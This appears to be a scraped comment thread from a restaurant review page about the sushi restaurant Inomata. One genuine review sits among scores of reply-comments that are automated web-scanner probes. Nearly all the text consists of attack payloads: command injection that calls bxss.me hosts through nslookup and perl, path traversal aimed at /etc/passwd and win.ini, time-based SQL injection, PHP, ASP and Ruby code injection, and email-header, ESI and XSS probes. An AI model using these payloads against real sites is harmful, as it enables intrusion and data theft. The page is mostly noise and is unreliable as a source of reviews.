./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
|(nslookup hitnphbhjwlby8b2d1.bxss.me||perl -e "gethostbyname('hitnphbhjwlby8b2d1.bxss.me')")
re: guest
file:///etc/passwd
re: guest
`(nslookup hitlkuefvtoggc7153.bxss.me||perl -e "gethostbyname('hitlkuefvtoggc7153.bxss.me')")`
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
;(nslookup hitvvbdkkhxau90a43.bxss.me||perl -e "gethostbyname('hitvvbdkkhxau90a43.bxss.me')")|(nslookup hitvvbdkkhxau90a43.bxss.me||perl -e "gethostbyname('hitvvbdkkhxau90a43.bxss.me')")&(nslookup hitvvbdkkhxau90a43.bxss.me||perl -e "gethostbyname('hitvvbdkkhxau90a43.bxss.me')")
re: guest
/WEB-INF/web.xml
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
Http://bxss.me/t/fit.txt
re: guest
/../../../../../../../../../../boot.ini
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
'.gethostbyname(lc('hitet'.'eqkkzquk148dd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(71).chr(100).chr(78).'
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
/etc/shells
re: guest
".gethostbyname(lc("hitmn"."qnpepzchc6749.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(72).chr(114).chr(77)."
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
c:/windows/win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
bxss.me
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
WEB-INF\web.xml
re: guest
"+"A".concat(70-3).concat(22*4).concat(116).concat(82).concat(98).concat(71)+(require"socket"
Socket.gethostbyname("hiter"+"iwifakjr26369.bxss.me.")[3].to_s)+"
re: guest
bxss.me/t/xss.html?%00
re: guest
'+'A'.concat(70-3).concat(22*4).concat(97).concat(78).concat(104).concat(72)+(require'socket'
Socket.gethostbyname('hitfe'+'ofrdwxnfc8bd1.bxss.me.')[3].to_s)+'
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
'"
re: guest
';print(md5(31337));$a='
re: guest
<!--
re: guest
";print(md5(31337));$a="
re: guest
${@print(md5(31337))}
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
re: guest
1
re: guest
1
re: guest
-1 OR 2+430-430-1=0+0+0+1 --
re: guest
-1 OR 3+430-430-1=0+0+0+1 --
re: guest
-1 OR 2+92-92-1=0+0+0+1
re: guest
-1 OR 3+92-92-1=0+0+0+1
re: guest
-1' OR 2+307-307-1=0+0+0+1 --
re: guest
-1' OR 3+307-307-1=0+0+0+1 --
re: guest
-1' OR 2+440-440-1=0+0+0+1 or 'apRaEwhg'='
re: guest
-1' OR 3+440-440-1=0+0+0+1 or 'apRaEwhg'='
re: guest
-1" OR 2+846-846-1=0+0+0+1 --
re: guest
-1" OR 3+846-846-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
GkykmDqa'; waitfor delay '0:0:15' --
re: guest
-5 OR 960=(SELECT 960 FROM PG_SLEEP(15))--
re: guest
-5) OR 827=(SELECT 827 FROM PG_SLEEP(15))--
re: guest
-1)) OR 846=(SELECT 846 FROM PG_SLEEP(15))--
re: guest
DaZ0oooi' OR 879=(SELECT 879 FROM PG_SLEEP(15))--
re: guest
gBiz9FOq') OR 779=(SELECT 779 FROM PG_SLEEP(15))--
re: guest
GwadinaI')) OR 845=(SELECT 845 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@DgNFG
I was just there and I agree with Wanderlusting. The rice is not the best and it sort of dies out after a few pieces, but I have to say the neta is some of the best out there. Every single piece of sushi I got was good, with plenty of highlights. His Oma maguro was some of the best tuna I've had; all the cuts were still marinated but compared to last time, the zuke was more mellow and I found the balance of the entire meal to be much better. Overall I think Inomata-san offers extremely high level sushi, with emphasis on truly top-quality ingredients (I would easily give the sushi at least 9/10). The location is not ideal but nigiri lovers should still make the pilgrimage.
The customer service was outstanding, as Mrs. Inomata is engaging and helps to initiate good conversation between diners and the chef. The price was less nice, but I feel like you get what you pay for...
@Guest - For better or worse, Inomata seems to attract a lot of tourists. It was quite easy to get a reservation around 2 months ago, but ever since Japan opened up, it's been a different story...
re: Just_Ingest
BxXM1vgP
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1 OR 2+840-840-1=0+0+0+1
re: Just_Ingest
-1 OR 3+840-840-1=0+0+0+1
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
PNa4HHxH
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1 OR 2+65-65-1=0+0+0+1
re: Just_Ingest
-1 OR 3+65-65-1=0+0+0+1
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
qJxlu4ps'; waitfor delay '0:0:15' --
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
-5 OR 144=(SELECT 144 FROM PG_SLEEP(15))--
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
-5) OR 623=(SELECT 623 FROM PG_SLEEP(15))--
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1)) OR 624=(SELECT 624 FROM PG_SLEEP(15))--
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
ckvvVOqh' OR 169=(SELECT 169 FROM PG_SLEEP(15))--
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
IE2faSrY') OR 227=(SELECT 227 FROM PG_SLEEP(15))--
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
OJXNjRhZ')) OR 963=(SELECT 963 FROM PG_SLEEP(15))--
re: Just_Ingest
a7spBQWc'; waitfor delay '0:0:15' --
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
-5 OR 766=(SELECT 766 FROM PG_SLEEP(15))--
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
-5) OR 229=(SELECT 229 FROM PG_SLEEP(15))--
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
-1)) OR 780=(SELECT 780 FROM PG_SLEEP(15))--
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
3ZNOR13G' OR 385=(SELECT 385 FROM PG_SLEEP(15))--
re: Just_Ingest
@@zuRh8
re: Just_Ingest
uG32Sy6d') OR 808=(SELECT 808 FROM PG_SLEEP(15))--
re: Just_Ingest
r0G0zyy3')) OR 139=(SELECT 139 FROM PG_SLEEP(15))--
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
@@3Zjm7
re: Just_Ingest
1NzQCnQ8O
re: Just_Ingest
response.write(9671078*9205780)
re: Just_Ingest
'+response.write(9671078*9205780)+'
re: Just_Ingest
"+response.write(9671078*9205780)+"
re: Just_Ingest
%0abcc:074625.67-14582.67.c962e.19990.2@bxss.me
re: Just_Ingest
to@example.com>%0d%0abcc:074625.67-14583.67.c962e.19990.2@bxss.me
re: Just_Ingest
../../../../../../../../../../../../../../etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../windows/win.ini
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
<esi:include src="http://bxss.me/rpb.png"/>
re: Just_Ingest
../../../../../../../../../../../../../../../proc/version
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Just_Ingest
../../../../../../../../../../etc/passwd%00.jpg
re: Just_Ingest
${9999507+9999728}
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Just_Ingest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Just_Ingest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Just_Ingest
echo xlnjin$()\ qrroxr\nz^xyu||a #' &echo xlnjin$()\ qrroxr\nz^xyu||a #|" &echo xlnjin$()\ qrroxr\nz^xyu||a #
re: Just_Ingest
/etc/passwd
re: Just_Ingest
&echo iipbaa$()\ mxwdnf\nz^xyu||a #' &echo iipbaa$()\ mxwdnf\nz^xyu||a #|" &echo iipbaa$()\ mxwdnf\nz^xyu||a #
re: Just_Ingest
%2fetc%2fpasswd
re: Just_Ingest
|echo tkwmfp$()\ nouqzj\nz^xyu||a #' |echo tkwmfp$()\ nouqzj\nz^xyu||a #|" |echo tkwmfp$()\ nouqzj\nz^xyu||a #
re: Just_Ingest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Just_Ingest
(nslookup hituvwlsqyjsb4db45.bxss.me||perl -e "gethostbyname('hituvwlsqyjsb4db45.bxss.me')")
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Just_Ingest
)
re: Just_Ingest
$(nslookup hitdetaceisasc67d3.bxss.me||perl -e "gethostbyname('hitdetaceisasc67d3.bxss.me')")
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Just_Ingest
!(()&&!|*|*|
re: Just_Ingest
&nslookup hitmqsgxagkfi04bfb.bxss.me&'\"`0&nslookup hitmqsgxagkfi04bfb.bxss.me&`'
re: Just_Ingest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Just_Ingest
^(#$!@#$)(()))******
re: Just_Ingest
&(nslookup hitpnthritsxz7fc32.bxss.me||perl -e "gethostbyname('hitpnthritsxz7fc32.bxss.me')")&'\"`0&(nslookup hitpnthritsxz7fc32.bxss.me||perl -e "gethostbyname('hitpnthritsxz7fc32.bxss.me')")&`'
re: Just_Ingest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Just_Ingest
|(nslookup hitysrbzrgcoocd44e.bxss.me||perl -e "gethostbyname('hitysrbzrgcoocd44e.bxss.me')")
re: Just_Ingest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Just_Ingest
`(nslookup hitlgharmbrqfabdbd.bxss.me||perl -e "gethostbyname('hitlgharmbrqfabdbd.bxss.me')")`
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
;(nslookup hitqjwxohvfaod911b.bxss.me||perl -e "gethostbyname('hitqjwxohvfaod911b.bxss.me')")|(nslookup hitqjwxohvfaod911b.bxss.me||perl -e "gethostbyname('hitqjwxohvfaod911b.bxss.me')")&(nslookup hitqjwxohvfaod911b.bxss.me||perl -e "gethostbyname('hitqjwxohvfaod911b.bxss.me')")
re: Just_Ingest
/\../\../\../\../\../\../\../etc/passwd
re: Just_Ingest
/WEB-INF/web.xml
re: Just_Ingest
'.gethostbyname(lc('hitdy'.'rvuoqufs75d15.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(66).chr(112).chr(89).'
re: Just_Ingest
C:\WINDOWS\system32\drivers\etc\hosts
re: Just_Ingest
".gethostbyname(lc("hitpd"."tdrhtuwg0ef92.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(78).chr(118).chr(69)."
re: Just_Ingest
../../../../../../../../../../windows/win.ini%00.jpg
re: Just_Ingest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Just_Ingest
/../../../../../../../../../../boot.ini
re: Just_Ingest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Just_Ingest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Just_Ingest
Http://bxss.me/t/fit.txt
re: Just_Ingest
..\..\..\..\..\..\..\..\windows\win.ini
re: Just_Ingest
http://bxss.me/t/fit.txt%3F.jpg
re: Just_Ingest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Just_Ingest
/etc/shells
re: Just_Ingest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Just_Ingest
HttP://bxss.me/t/xss.html?%00
re: Just_Ingest
"+"A".concat(70-3).concat(22*4).concat(99).concat(71).concat(115).concat(74)+(require"socket"
Socket.gethostbyname("hitkg"+"gfbiiarga176e.bxss.me.")[3].to_s)+"
re: Just_Ingest
c:/windows/win.ini
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Just_Ingest
bxss.me/t/xss.html?%00
re: Just_Ingest
'+'A'.concat(70-3).concat(22*4).concat(122).concat(69).concat(99).concat(88)+(require'socket'
Socket.gethostbyname('hitxb'+'yaelvtys7c4a3.bxss.me.')[3].to_s)+'
re: Just_Ingest
bxss.me
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Just_Ingest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\